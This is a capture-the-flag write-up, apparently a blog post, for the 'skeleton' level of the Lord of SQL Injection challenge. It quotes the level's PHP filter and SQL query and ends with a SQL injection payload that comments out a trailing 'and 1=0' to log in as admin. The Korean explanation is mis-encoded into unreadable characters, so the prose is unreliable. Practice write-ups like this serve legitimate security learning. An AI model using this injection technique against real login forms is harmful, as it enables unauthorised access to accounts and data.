ํ‹ฐ์Šคํ† ๋ฆฌ ๋ทฐ

10๋ฒˆ์งธ ๋ฌธ์ œ์ธ " skelton "์ž…๋‹ˆ๋‹ค.

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET [pw])) exit("No Hack ~_~"); 

๊ฒ€์ฆ๋˜๋Š” ๋ฌธ์ž์—ด์„ ํ™•์ธํ•ด ๋ณด๋ฉด ์ด์ฒ˜๋Ÿผ ํŠน์ˆ˜๊ธฐํ˜ธ ๋ช‡๊ฐœ๋งŒ ๊ฒ€์ฆ์„ ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

 

$query = "select id from prob_skeleton where id='guest' and pw='{$_GET [pw]}' and 1=0"; 

์šฐ๋ฆฌ๊ฐ€ ์‚ฌ์šฉํ•  ๋ณ€์ˆ˜๋Š” " pw='{$_GET[pw]} " ์ด ๋ถ€๋ถ„์„ ์‚ฌ์šฉํ•˜๋ฉด ๋  ๊ฑฐ ๊ฐ™์ง€๋งŒ " and 1=0 " ์—ฐ์‚ฐ์ž๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์— '1'='1' ํ˜•ํƒœ์˜ ์ฐธ๊ฐ’์„ ๋Œ€์ž…ํ•ด๋„ ๊ฑฐ์ง“ ๊ฐ’์œผ๋กœ ์ธ์‹์„ ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

if($result ['id'] == 'admin') solve("skeleton");

๋˜ํ•œ ํ•ด๋‹น์†Œ์Šค์—๋Š” guest ๊ณ„์ •์œผ๋กœ ๋˜์–ด ์žˆ๊ธฐ์— " admin " ๊ณ„์ •์œผ๋กœ ์„ ์–ธํ•œ ํ›„ ๊ทธ ์ดํ›„์˜ ๊ฑฐ์ง“ ์—ฐ์‚ฐ์ž์ธ and 1=0์„ #(์ฃผ์„) ์ฒ˜๋ฆฌํ•˜๋ฉด ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•  ์ˆ˜ ์žˆ์„ ๊ฒƒ ๊ฐ™์Šต๋‹ˆ๋‹ค.

 

Exploit Code

' or id='admin'%23

'CHALLENGE' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

XSS Challenges 4  (0) 2020.12.06
[LOS] Golem ํ’€์ด(11)  (0) 2020.12.06
[LOS] Vampire ํ’€์ด(9)  (0) 2020.12.06
[LOS] Troll ํ’€์ด(8)  (0) 2020.12.06
[LOS] ORGE ํ’€์ด(7)  (0) 2020.12.06
๊ณต์œ ํ•˜๊ธฐ ๋งํฌ
Comment